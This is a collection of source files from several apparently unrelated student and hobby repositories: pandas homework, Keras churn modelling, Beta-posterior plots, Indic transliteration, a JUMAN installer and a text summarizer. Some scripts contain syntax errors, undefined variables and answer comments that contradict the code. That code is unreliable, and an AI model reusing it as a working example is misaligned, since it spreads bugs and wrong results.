# 今はガウス基底を用います\n print(Phi_p.shape)\n plt.plot(X_p, Phi_p)\n plt.show()\n\n fig1, axes = plt.subplots(1, 2, sharex=False, sharey=True, figsize=(10, 5))\n ax1 = axes[0]\n ax1.set_title(\"Maximum Evidence\")\n ax1.plot(X_p, model.w[-1].dot(Phi_p.T), \"-\", label=\"Prediction\", color=\"C1\")\n ax2 = axes[1]\n ax2.set_title(\"Normal MAP\")\n ax2.plot(X_p, model.w[0].dot(Phi_p.T), \"-\", label=\"Prediction\", color=\"C1\")\n for i in range(2):\n axes[i].plot(np.linspace(-np.pi, np.pi, 200), np.sin(np.linspace(-np.pi, np.pi, 200)), \"--\",\n color=\"C0\", label=\"Truth\")\n axes[i].plot(X, t, \"o\", label=\"Training data\", color=\"C0\", alpha=.8)\n axes[i].set_xlim(-np.pi - .2, np.pi + .2)\n axes[i].set_ylim(-1.5, 1.5)\n axes[i].legend(loc=\"lower right\")\n fig1.tight_layout()\n fig1.savefig(\"../figures/linear_regression_max-evidence_vs_normal-map.png\", dpi=150)\n plt.show()" } ]
11
gabhiramkrishna/SF_DAT_15_WORK
https://github.com/gabhiramkrishna/SF_DAT_15_WORK
76493225c48344e2ee2c834c15ee36ad08e91193
8c166c275310068b936f2910dd24323fddf0a430
4ad0e57ba428e8bfa083574b7ac339a21bd39e2e
refs/heads/master
2021-01-25T10:43:38.090949
2015-07-02T01:42:04
2015-07-02T01:42:04
37,505,849
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7066202163696289, "alphanum_fraction": 0.7347270846366882, "avg_line_length": 32.11538314819336, "blob_id": "02e0aebc1c95c0ea55db3820d196d0e17f03cfe1", "content_id": "c1bfddbe610f47f16322a59e12dcdaef91e80748", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4305, "license_type": "no_license", "max_line_length": 127, "num_lines": 130, "path": "/hw1.py", "repo_name": "gabhiramkrishna/SF_DAT_15_WORK", "src_encoding": "UTF-8", "text": "'''\nMove this code into your OWN SF_DAT_15_WORK repo\n\nPlease complete each question using 100% python code\n\nIf you have any questions, ask a peer or one of the instructors!\n\nWhen you are done, add, commit, and push up to your repo\n\nThis is due 7/1/2015\n'''\n\n\nimport pandas as pd\n# pd.set_option('max_colwidth', 50)\n# set this if you need to\n\nkillings = pd.read_csv('https://raw.githubusercontent.com/sinanuozdemir/SF_DAT_15/master/hw/data/police-killings.csv')\nkillings.head()\n\n\n# 1. Make the following changed to column names:\n# lawenforcementagency -> agency\n# raceethnicity -> race\n\nkillings.rename(columns={'raceethnicity':'race', 'lawenforcementagency':'agency'}, inplace=True)\n\n# 2. Show the count of missing values in each column\n\nkillings.isnull().sum()\n\n# 3. replace each null value in the dataframe with the string \"Unknown\"\n\nkillings.fillna(value='Unknown', inplace=True)\n\n# 4. How many killings were there so far in 2015?\n\nkillings[killings.year==2015].year.value_counts() #467\n\n\n# 5. Of all killings, how many were male and how many female?\n\nkillings.gender[killings.gender=='Male'].value_counts() #445\nkillings.gender[killings.gender=='Female'].value_counts() #22\n# 6. How many killings were of unarmed people?\n\nkillings.armed[killings.armed=='No'].value_counts() #10\n# 7. What percentage of all killings were unarmed?\n\nkillings.armed[killings.armed=='No'].value_counts() / killings.shape[0] * 100 #21%\n# 8. What are the 5 states with the most killings?\n\nkillings.groupby('state').state.count()\n# 9. Show a value counts of deaths for each race\n\nkillings.groupby('race').race.count()\n\n# 10. Display a histogram of ages of all killings\n\nkillings.hist(by=killings.age, sharex=True, sharey=True)\n\n# 11. Show 6 histograms of ages by race\n\nkillings.hist(by=killings.race, sharex=True, sharey=True, bins=6)\n\n\n# 12. What is the average age of death by race?\n\nkillings.groupby('race').age.mean()\n\n# 13. Show a bar chart with counts of deaths every month\n\nkillings.month.value_counts().plot(kind='bar', title = 'count of deaths every month')\n\n\n###################\n### Less Morbid ###\n###################\n\nmajors = pd.read_csv('https://raw.githubusercontent.com/sinanuozdemir/SF_DAT_15/master/hw/data/college-majors.csv')\nmajors.head()\n\n# 1. Delete the columns (employed_full_time_year_round, major_code)\ndel majors['Employed_full_time_year_round']\ndel majors['Major_code']\n\n# 2. Show the cout of missing values in each column\n\nmajors.isnull().sum()\n\n# 3. What are the top 10 highest paying majors?\ntopTenMajors = majors.sort_index(by='Median', ascending=False).head(10)\n\n# 4. Plot the data from the last question in a bar chart, include proper title, and labels!\n\ntopTenMajors[['Major','Median']].plot(kind='bar', title='Top 10 highest paying majors', x='Major', y='Median')\n\n# 5. What is the average median salary for each major category?\n\nmajors.groupby('Major_category').Median.mean()\n\n# 6. 
Show only the top 5 paying major categories\nmajors.sort_index(by='Median', ascending=False).head()\n\n# 7. Plot a histogram of the distribution of median salaries\n\nmajors.hist(by=majors.Median, sharex=True, sharey=True)\n\n# 8. Plot a histogram of the distribution of median salaries by major category\nmajors.groupby('Major_category').Median.mean().plot(kind='bar', title='Bar chart of average median salaries by major category')\n\n# 9. What are the top 10 most UNemployed majors?\n# What are the unemployment rates?\nmajors.sort_index(by='Unemployed', ascending=False)[['Major', 'Unemployment_rate', 'Unemployed']].head(10)\n\n# 10. What are the top 10 most UNemployed majors CATEGORIES? Use the mean for each category\n# What are the unemployment rates?\nmajors.groupby('Major_category').Unemployed.mean().order(ascending = False).head(10)\n\n# 11. the total and employed column refer to the people that were surveyed.\n# Create a new column showing the emlpoyment rate of the people surveyed for each major\n# call it \"sample_employment_rate\"\n# Example the first row has total: 128148 and employed: 90245. it's \n# sample_employment_rate should be 90245.0 / 128148.0 = .7042\nmajors['sample_employment_rate'] = majors.Employed/majors.Total\n\n# 12. Create a \"sample_unemployment_rate\" colun\n# this column should be 1 - \"sample_employment_rate\"\n\nmajors['sample_unemployment_rate'] =1 - majors.sample_employment_rate\n" }, { "alpha_fraction": 0.7083333134651184, "alphanum_fraction": 0.75, "avg_line_length": 23.5, "blob_id": "e0b1fe9af8e1053070124039997981451bd18eac", "content_id": "851753885ef8580b6fa44e3d31844e8de9a8c7eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 48, "license_type": "no_license", "max_line_length": 31, "num_lines": 2, "path": "/README.md", "repo_name": "gabhiramkrishna/SF_DAT_15_WORK", "src_encoding": "UTF-8", "text": "# SF_DAT_15_WORK\nMy data science work - modified" } ]
2
Ankit404butfound/indic_transliteration
https://github.com/Ankit404butfound/indic_transliteration
c04f3fd96d22a30ce2aa3ca5bcd1151144852a46
0be35c398a7291184a21b107d21610c6465827b8
3c8ba8a14b4c40671439e0e7a18cd7e2b5089f5f
refs/heads/master
2022-10-07T10:42:56.588750
2020-06-07T15:38:03
2020-06-07T15:38:03
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6813380122184753, "alphanum_fraction": 0.6813380122184753, "avg_line_length": 53.967742919921875, "blob_id": "dad820c9feb9f425c53af7966b4209ef24aa5e1d", "content_id": "d6b41c6729232edd083ba46ef4182ca810fbc527", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1704, "license_type": "permissive", "max_line_length": 205, "num_lines": 31, "path": "/indic_transliteration/sanscript/schemes/__init__.py", "repo_name": "Ankit404butfound/indic_transliteration", "src_encoding": "UTF-8", "text": "\nclass Scheme(dict):\n \"\"\"Represents all of the data associated with a given scheme. In addition\n to storing whether or not a scheme is roman, :class:`Scheme` partitions\n a scheme's characters into important functional groups.\n \n :class:`Scheme` is just a subclass of :class:`dict`.\n \n :param data: a :class:`dict` of initial values. Note that the particular characters present here are also assumed to be the _preferred_ transliterations when transliterating to this scheme. \n :param synonym_map: A map from keys appearing in `data` to lists of symbols with equal meaning. For example: M -> ['.n', .'m'] in ITRANS. This synonym_map is not used in transliterating to this scheme.\n :param is_roman: `True` if the scheme is a romanization and `False`\n otherwise.\n \"\"\"\n\n def __init__(self, data=None, synonym_map=None, is_roman=True, name=None):\n super(Scheme, self).__init__(data or {})\n if synonym_map is None:\n synonym_map = {}\n self.synonym_map = synonym_map\n self.is_roman = is_roman\n self.name = name\n\n def fix_lazy_anusvaara(self, data_in):\n from indic_transliteration import sanscript\n data_out = sanscript.transliterate(data=data_in, _from=self.name, _to=sanscript.DEVANAGARI)\n data_out = sanscript.SCHEMES[sanscript.DEVANAGARI].fix_lazy_anusvaara(data_in=data_out)\n return sanscript.transliterate(data=data_out, _from=sanscript.ITRANS, _to=self.name)\n \n def from_devanagari(self, data):\n \"\"\"A convenience method\"\"\"\n from indic_transliteration import sanscript\n return sanscript.transliterate(data=data, _from=sanscript.DEVANAGARI, _to=self.name)" }, { "alpha_fraction": 0.6873536109924316, "alphanum_fraction": 0.7014051675796509, "avg_line_length": 44, "blob_id": "805f9877672682eabfe19cd11a9713fa10223e84", "content_id": "fd35b1abcc2578949cdf2c35f5b285e95f5aab66", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1038, "license_type": "permissive", "max_line_length": 113, "num_lines": 19, "path": "/tests/sanscript/brahmic_test.py", "repo_name": "Ankit404butfound/indic_transliteration", "src_encoding": "UTF-8", "text": "from indic_transliteration import sanscript\n\n\n\ndef test_fix_lazy_anusvaara_devanagari():\n assert sanscript.SCHEMES[sanscript.DEVANAGARI].fix_lazy_anusvaara(\"तं जित्वा\") == \"तञ् जित्वा\"\n assert sanscript.SCHEMES[sanscript.DEVANAGARI].fix_lazy_anusvaara(\"जगइ\") == \"जगइ\"\n\ndef test_fix_lazy_visarga():\n assert sanscript.SCHEMES[sanscript.DEVANAGARI].fix_lazy_visarga(\"अन्तः पश्य\") == \"अन्तᳶ पश्य\"\n assert sanscript.SCHEMES[sanscript.DEVANAGARI].fix_lazy_visarga(\"अन्तः कुरु\") == \"अन्तᳵ कुरु\"\n\ndef test_do_vyanjana_svara_join():\n devanagari = sanscript.SCHEMES[sanscript.DEVANAGARI]\n assert devanagari.do_vyanjana_svara_join(\"ह्र्\", \"ईः\") == \"ह्रीः\"\n\ndef test_apply_roman_numerals():\n devanagari_str = \"हरि बोल १ ३ ५४ ६ ९को\"\n assert 
sanscript.SCHEMES[sanscript.DEVANAGARI].apply_roman_numerals(devanagari_str) == \"हरि बोल 1 3 54 6 9को\"" } ]
2
KoichiYasuoka/juman-cygwin32
https://github.com/KoichiYasuoka/juman-cygwin32
910463ec965696419e6ea2d1e25bd8b501ce7d03
0befb16e6e0d420ff786684bdc08218eb86c86d1
e7d6e4c0878a51d109d09c78715f76922720c968
refs/heads/master
2022-04-22T10:46:20.696674
2020-04-19T05:07:43
2020-04-19T05:07:43
256,917,921
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6392961740493774, "alphanum_fraction": 0.6803519129753113, "avg_line_length": 21.66666603088379, "blob_id": "528c275e9728cea6574b0fbaa70ba338f652b91d", "content_id": "c25f6a4b4fabfe78dde4a464fe2019c74767426d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 341, "license_type": "permissive", "max_line_length": 110, "num_lines": 15, "path": "/README.md", "repo_name": "KoichiYasuoka/juman-cygwin32", "src_encoding": "UTF-8", "text": "# juman-cygwin32\n\n[JUMAN](http://nlp.ist.i.kyoto-u.ac.jp/?JUMAN) 7.01 for [Cygwin](https://www.cygwin.com/) (32-bit UTF-8 only).\n\n## Usage\n\nSee [JUMAN page](http://nlp.ist.i.kyoto-u.ac.jp/?JUMAN).\n\n## Installation\n\nOnly for Cygwin with `python37-pip` and `git`:\n\n```sh\npip3.7 install git+https://github.com/KoichiYasuoka/juman-cygwin32\n```\n\n" }, { "alpha_fraction": 0.6414391994476318, "alphanum_fraction": 0.6575682163238525, "avg_line_length": 32.58333206176758, "blob_id": "6d6652534607db0fec7c102861591635cee78029", "content_id": "84c378a8a7bbabf85ca38be0ab8a86d62c9aa303", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 806, "license_type": "permissive", "max_line_length": 79, "num_lines": 24, "path": "/setup.py", "repo_name": "KoichiYasuoka/juman-cygwin32", "src_encoding": "UTF-8", "text": "import setuptools\nimport glob\nimport platform\nif platform.system().startswith(\"CYGWIN\") and platform.machine()!=\"x86_64\":\n pass\nelse:\n raise OSError(\"juman-cygwin32 only for 32-bit Cygwin\")\n\nsetuptools.setup(\n name=\"juman-cygwin32\",\n version=\"0.6.0\",\n packages=setuptools.find_packages(),\n data_files=[\n (\"local/bin\",glob.glob(\"bin/*\")),\n (\"local/libexec/juman\",glob.glob(\"libexec/juman/*\")),\n (\"local/lib\",glob.glob(\"lib/*\")),\n (\"local/etc\",glob.glob(\"etc/*\")),\n (\"local/include\",glob.glob(\"include/*\")),\n (\"local/share/juman/dic\",glob.glob(\"share/juman/dic/*\")),\n (\"local/share/juman/autodic\",glob.glob(\"share/juman/autodic/*\")),\n (\"local/share/juman/wikipediadic\",glob.glob(\"share/juman/wikipediadic/*\")),\n (\"local/share/juman/doc\",glob.glob(\"share/juman/doc/*\"))\n ]\n)\n" } ]
2
zhouyang123200/SreAuto
https://github.com/zhouyang123200/SreAuto
cd1c2bc915f8384ab9bf094094f9c6aab8f3510c
fde7cb691b30dfe4008515e05ecf6005442ab179
d31203f0f0af224608b3ed4b8187561aebc5bd9b
refs/heads/master
2017-12-04T08:12:52.155755
2017-02-26T01:55:54
2017-02-26T01:55:54
83,176,194
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7605633735656738, "alphanum_fraction": 0.7605633735656738, "avg_line_length": 17, "blob_id": "eccbbc7045602bbd3f101abbb0d4565446acb654", "content_id": "c38c07743cb2b6150cb4c2cfa529c7a8ffaf6b19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 71, "license_type": "no_license", "max_line_length": 29, "num_lines": 4, "path": "/demo_psutil.py", "repo_name": "zhouyang123200/SreAuto", "src_encoding": "UTF-8", "text": "import psutil\n\nmem = psutil.virtual_memory()\nprint(mem.total, mem.used)" } ]
1
harsha63/FODSassignment
https://github.com/harsha63/FODSassignment
e59769e8bfbe4dd856eb03197ea2298e996c5910
f1e3fefe81b1061093161081d5e5109c53d39676
b55ab4c4a50748b56b1756dd7b21c430349dc4d0
refs/heads/main
2023-01-02T09:49:53.683923
2020-10-23T06:50:52
2020-10-23T06:50:52
306,551,279
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7131147384643555, "alphanum_fraction": 0.7377049326896667, "avg_line_length": 11.199999809265137, "blob_id": "f39fc9d01a058dcf1cb3504071b2c8e5bc683007", "content_id": "9626f7e08ed4d19dfe3e468ad28749f9a90d3d35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 122, "license_type": "no_license", "max_line_length": 40, "num_lines": 10, "path": "/README.md", "repo_name": "harsha63/FODSassignment", "src_encoding": "UTF-8", "text": "# FODSassignment\n\n\nBITS Course: Foundations of Data Science\nDone in python.\n\nCollaborators:\n1. Shivangi Sharma\n2. Ishita Kukreti\n3. Harsha\n" }, { "alpha_fraction": 0.4068857729434967, "alphanum_fraction": 0.47183099389076233, "avg_line_length": 14.52439022064209, "blob_id": "5cf58761197752b4a038e616278e620c6183f2b0", "content_id": "ad6ec34431d6930be99ceee501cf0f280b9e16e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1281, "license_type": "no_license", "max_line_length": 72, "num_lines": 82, "path": "/3A.py", "repo_name": "harsha63/FODSassignment", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[16]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.special import gamma as G\n\n\n# In[17]:\n\n\nk = 1\na = 4\nb = 6\nu = 0\nN = 160\n\n\n# In[18]:\n\n\nM = np.random.randint(1, 161)\nwhile M >= 0.4 * 160 and M <= 0.6 * 160:\n M = np.random.randint(1, 161)\nL = N - M\narr = np.array([0] * (N - M) + [1] * M)\nnp.random.shuffle(arr)\n\n\n# In[19]:\n\n\nimages = []\nP = []\nQ = []\nm = 0\nl = 0\nMaxP = 0\n\n\n# In[20]:\n\n\nU_ML = M / 160.00\nprint ('%0.2f' % U_ML)\n\n\n# In[ ]:\n\n\nfor j in range(len(arr)):\n P = []\n Q = []\n u = 0\n\n for i in range(101):\n if u > 1:\n u = 1\n Norm = G(a+b+l+m)/(G(a+m)*G(b+l))\n u1 = pow(u, a-1 + m)\n u2 = pow(1 - u, b- 1 + l)\n P_Val = Norm * u1 * u2 #beta function\n if MaxP < P_Val:\n MaxP = P_Val\n P.append(P_Val)\n Q.append(u)\n u += 0.010000\n if arr[j] == 1:\n m += 1\n else:\n l += 1\nfig = plt.figure()\nplt.plot(U, P, 'g')\nplt.ion()\nplt.axis([0, 1, 0, 25])\nplt.xlabel('μ ' + '(No. of points sampled = ' + str(j + 1) + ')')\nplt.ylabel('Prior probability distribution (β)')\nplt.text(0.4, 27, 'μ ML = ' + str(U_ML))\nfig.savefig('/Users/harsha/Desktop/Imagedata3/plot' + str(j+1) + '.png')\n \n\n" }, { "alpha_fraction": 0.5003287196159363, "alphanum_fraction": 0.5693622827529907, "avg_line_length": 14.670103073120117, "blob_id": "792e8e8db968913a4c246b22075e40341e281332", "content_id": "ab2cf6e4e38a3e3cc2b9c4b40b7c3b7bba8b139a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1522, "license_type": "no_license", "max_line_length": 114, "num_lines": 97, "path": "/3B.py", "repo_name": "harsha63/FODSassignment", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[16]:\n\n\nimport numpy as np \nimport matplotlib.pyplot as plt \nfrom pylab import figure, text, scatter, show\nfrom scipy.special import gamma as G\n\n\n# In[13]:\n\n\nimport scipy as sp\nimport random \nimport scipy.integrate\n\n\n# In[8]:\n\n\na=4; b=6; mu=np.linspace(0,1,100);\nbeta=(scipy.special.gamma (a+b)/(scipy.special.gamma (a)*scipy.special.gamma (b)))*((mu)**(a-1))*(((1-mu)**(b-1)))\n\n\n# In[18]:\n\n\nplt.plot(mu,beta)\ntext(0.1, 0.9,'prior', ha='center', va='center')\n\n\n# In[30]:\n\n\n## M = Number of Heads in Randomly Generated Sample. 
\nu = 0\nN = 160\nM = np.random.randint(1,161)\nwhile(M >= 0.4*160 and M <= 0.6*160):\n M = np.random.randint(1,161)\nL = N - M\narr = np.array([0]*(N-M) + [1]*(M))\t\nnp.random.shuffle(arr)\nU_ML = M/160.00\n\nP = []\nU = []\nfor i in range (101):\n if u > 1:\n u = 1\n Norm = G(a + b + N)/(G(a + M)*G(b + L))\n u1 = pow(u, (a - 1 + M))\n u2 = pow(1 - u, (b - 1 + L))\n P_Val = Norm * u1 * u2\n P.append(P_Val)\n U.append(u)\n u += 0.010000\n #print(Norm)\nprint('%0.2f' %U_ML)\n\nfig = plt.figure()\nplt.plot(U, P)\ntext(0.1, 0.9,'posterior', ha='center', va='center')\nplt.ion()\nplt.xlabel('μ')\nplt.ylabel('P')\nplt.show()\nplt.pause(0.1)\nplt.close()\nfig.savefig('Final Graph.png')\n\n\n# In[36]:\n\n\nzero=random.randint(0,40)\none=160-zero\nn=[0]*zero+[1]*one\nrandom.shuffle(n)\nN=n\n\n\n# In[37]:\n\n\nu=np.linspace(0,1,100)\nb=lambda u: (u**N[i])*((1-u)**(1-N[i]))\n\n\n# In[39]:\n\n\nplt.plot(u,b(u))\ntext(0.1, 0.9,'likelihood', ha='center', va='center')\n\n" } ]
3
jaskirat111/deep_learning_ann
https://github.com/jaskirat111/deep_learning_ann
8b51d39d621f66887d5ad76a052634f094951f20
3f99b0c37e2818567490e014d54385a0af385a25
ced94242a7c85dbf6daf97c14e4fb0be824183dd
refs/heads/master
2020-05-31T10:46:05.124507
2019-06-04T11:48:44
2019-06-04T11:48:44
190,247,254
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7221652269363403, "alphanum_fraction": 0.7437147498130798, "avg_line_length": 28.755725860595703, "blob_id": "989b48285e5119d6b071f61c0d94e48e53082766", "content_id": "9bae4c985e449e0635312b9232e447e33d73c1e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3898, "license_type": "no_license", "max_line_length": 103, "num_lines": 131, "path": "/py_files/deep_learning_ann.py", "repo_name": "jaskirat111/deep_learning_ann", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 4 10:30:44 2018\n\n@author: DELL\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n#ading of data\ndataset=pd.read_csv('C:\\\\Users\\\\\\DELL\\\\Desktop\\\\ml\\\\deep_learning_ann\\\\csv_files\\\\Churn_Modelling.csv')\nX=dataset.iloc[: ,3:13].values\nY=dataset.iloc[:, 13].values \n\nfrom sklearn.preprocessing import LabelEncoder,OneHotEncoder\nlabelencoder_x_1= LabelEncoder() \nX[:, 1]=labelencoder_x_1.fit_transform(X[: ,1])\nlabelencoder_x_2=LabelEncoder()\nX[:, 2]=labelencoder_x_2.fit_transform(X[: ,2])\nonehotencoder=OneHotEncoder(categorical_features=[1])\nX=onehotencoder.fit_transform(X).toarray() \nX=X[:, 1:]\n\n#s[litting dataset into the training set and test t\n\nfrom sklearn.cross_validation import train_test_split \nX_train,X_test,y_train,y_test=train_test_split(X,Y,test_size=0.25,random_state=0)\n#feature scaling\nfrom sklearn.preprocessing import StandardScaler\nsc=StandardScaler()\nX_train=sc.fit_transform(X_train)\nX_test=sc.transform(X_test)\n#import the keras Libraries and packages\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\n#initialising the ann\nClassifier=Sequential()\n#adding the input layer and the first hidden layer\nClassifier.add(Dense(output_dim=6,init='uniform',activation='relu',input_dim=11))\n#adding the secong hidden layer\nClassifier.add(Dense(output_dim=6,init='uniform',activation='relu')\n\nClassifier.add(Dense(output_dim=6,init='uniform',activation='relu')\n\n#adding the output layer\nClassifier.add(Dense(output_dim=1,init='uniform',activation='sigmoid'))\n#compiling the ann\nClassifier.compile(optimizer='adam',loss='binary_crossentropy',metrics=['accuracy'])\n#making the predictions\nClassifier.fit(X_train,y_train,batch_size=10,nb_epoch=100)\n\n#making the predictions\ny_pred=Classifier.predict(X_test)\n\n\n\n\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n#reading of data\n#tensorflow+theano = Keras\n\n\ndataset=pd.read_csv('C:\\\\Users\\\\\\DELL\\\\Desktop\\\\ml\\\\deep_learning_ann\\\\csv_files\\\\Churn_Modelling.csv')\n\nx = dataset.iloc[:,3 :13].values\ny = dataset.iloc[:,13].values\n\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\n\nlabelencoder_1 = LabelEncoder()\n\nx[:, 1] = labelencoder_1.fit_transform(x[:, 1])\n\n\nlabelencoder_2 = LabelEncoder()\n\nx[:, 2] = labelencoder_2.fit_transform(x[:, 2])\n\nonehotencoder = OneHotEncoder(categorical_features = [1])\n\n\nx = onehotencoder.fit_transform(x).toarray()\n\nx = x[:, 1:]\nfrom sklearn.cross_validation import train_test_split\n\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size = 0.2)\n\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nx_train = sc.fit_transform(x_train)\nx_test = sc.transform(x_test) \n\n#Importing the keras libraries and Package\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\n#Initialiasing the 
Ann\nClassifier = Sequential()\n\n#adding the input layer and first hidden layer\nClassifier.add(Dense(output_dim = 6, init ='uniform',activation = 'relu',input_dim = 11))\n#adding the second layer\nClassifier.add(Dense(output_dim = 6, init ='uniform',activation = 'relu'))\n\nClassifier.add(Dense(output_dim = 100, init ='uniform',activation = 'relu'))\nClassifier.add(Dense(output_dim = 100, init ='uniform',activation = 'relu'))\nClassifier.add(Dense(output_dim = 100, init ='uniform',activation = 'relu'))\nClassifier.add(Dense(output_dim = 100, init ='uniform',activation = 'relu'))\n\n\n\n#Adding teh output layer\nClassifier.add(Dense(output_dim = 1, init ='uniform',activation = 'sigmoid'))\n\nClassifier.compile(optimizer = 'adam',loss = 'binary_crossentropy',metrics = ['accuracy'])\n#Making the predictions \nClassifier.fit(x_train,y_train,batch_size = 1000 ,nb_epoch = 2000)\n\ny_pred = Classifier.predict(x_test)\n\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test,y_pred.round())\n" } ]
1
Peter-32/summarize1
https://github.com/Peter-32/summarize1
9b00ca5c6f6e0244fe72e8d94ec1008db70c0004
bad287fc97ec34b6bed78b9aed9b0933ae61bba0
3bae8901b1d97418bff9f682e7eac4ed47569f2d
refs/heads/master
2020-09-19T19:47:10.059134
2019-12-04T23:02:00
2019-12-04T23:02:00
224,281,199
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7063732743263245, "alphanum_fraction": 0.7132018208503723, "avg_line_length": 30.759037017822266, "blob_id": "b374a6fcbad578c3394bf3e3cb59f03dd817c8b5", "content_id": "d42bd7555074d86aca6fd3ea0495d3d9de9f7631", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2636, "license_type": "permissive", "max_line_length": 154, "num_lines": 83, "path": "/src/main/1.summarize1.py", "repo_name": "Peter-32/summarize1", "src_encoding": "UTF-8", "text": "# Add this project to the path\nimport os; import sys; currDir = os.path.dirname(os.path.realpath(\"__file__\"))\nrootDir = os.path.abspath(os.path.join(currDir, '..')); sys.path.insert(1, rootDir)\n\n# Warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# Public modules\nimport re\nimport nltk\nimport spacy\nfrom os import path\nimport networkx as nx\nimport numpy as np\nimport pyperclip as clip\nfrom numpy.random import seed\nfrom nltk.corpus import wordnet as wn\nfrom nltk.tokenize import word_tokenize\nfrom scipy.spatial.distance import pdist, squareform\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\n\n# Set seed\nseed(32)\n\n# Initialize Helper Objects\nprint(\"Longer text leads to a longer runtime\")\nprint(\"Progress: 0%\")\nwnl = nltk.WordNetLemmatizer()\ntfidf = TfidfVectorizer()\nnlp = spacy.load('en_core_web_sm')\n\n# Clean Sentences\ndoc = clip.paste()\ndoc = doc.lower()\nsents = nltk.sent_tokenize(doc)\nprocessed_sents = []\nfor sent in sents:\n words = word_tokenize(sent)\n words = [re.sub(r'[^A-Za-z_\\s]', '', w) for w in words]\n words = [wnl.lemmatize(w) for w in words if w.strip() != '']\n processed_sent = \" \".join(words)\n processed_sents.append(processed_sent)\n\n# Create Dictionaries\nprint(\"Progress: 20%\")\ntfidf.fit(processed_sents)\ntfidf_weights_dict, embeddings_dict = dict(zip(tfidf.get_feature_names(), tfidf.idf_)), {}\nvocabulary = tfidf_weights_dict.keys()\nfor word in vocabulary:\n embeddings_dict[word] = nlp(word).vector\n\n# Convert Sentences into Numbers\nprint(\"Progress: 40%\")\nsent_vectors = []\nfor sent in processed_sents:\n vector_sum, denominator = [0]*96, 0\n for word in sent.split(\" \"):\n try:\n vector_sum += embeddings_dict[word]*tfidf_weights_dict[word]\n denominator += tfidf_weights_dict[word]\n except:\n pass\n if denominator != 0:\n sent_vectors.append(vector_sum/denominator)\n else:\n sent_vectors.append(vector_sum)\n\n# Sentence Similarity\nprint(\"Progress: 60%\")\nsent_vectors = np.array(sent_vectors)\nsent_vectors = StandardScaler().fit_transform(sent_vectors)\nsent_vectors = MinMaxScaler().fit_transform(sent_vectors)\ndistances = pdist(sent_vectors, metric='euclidean')\nsentence_similarity_matrix = squareform(distances)\n\n# Graph and PageRank\nprint(\"Progress: 80%\")\ngraph = nx.from_numpy_array(sentence_similarity_matrix)\nscores = nx.pagerank(graph)\nclip.copy(\"\\n\\n\".join([sents[score] for score in [x for (x,y) in sorted([(x,y) for (x,y) in scores.items()], key= lambda x: float(x[1]), reverse=True)]]))\nprint(\"Done - results are in the clipboard\")\n" }, { "alpha_fraction": 0.7294166088104248, "alphanum_fraction": 0.7339677214622498, "avg_line_length": 29.212499618530273, "blob_id": "3907431eeddc25adca2a2197d1a4dc644481ec97", "content_id": "585446049d0ba39d609f5557f88d89f03c2d388b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2417, 
"license_type": "permissive", "max_line_length": 83, "num_lines": 80, "path": "/src/main/old/2.review_results.py", "repo_name": "Peter-32/summarize1", "src_encoding": "UTF-8", "text": "# Add this project to the path\nimport os; import sys; currDir = os.path.dirname(os.path.realpath(\"__file__\"))\nrootDir = os.path.abspath(os.path.join(currDir, '..')); sys.path.insert(1, rootDir)\n\n# Warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# Public modules\nimport re\nimport os\nimport nltk\nimport spacy\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom os import path\nimport networkx as nx\nimport lightgbm as lgb\nfrom pandas import read_csv\nfrom sklearn.svm import SVC\nfrom numpy.random import seed\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\nfrom nltk.corpus import stopwords\nfrom sklearn.pipeline import Pipeline\nfrom nltk.corpus import wordnet as wn\nfrom nltk.tokenize import word_tokenize\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.decomposition import TruncatedSVD\n OneHotEncoder\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.feature_extraction.text import 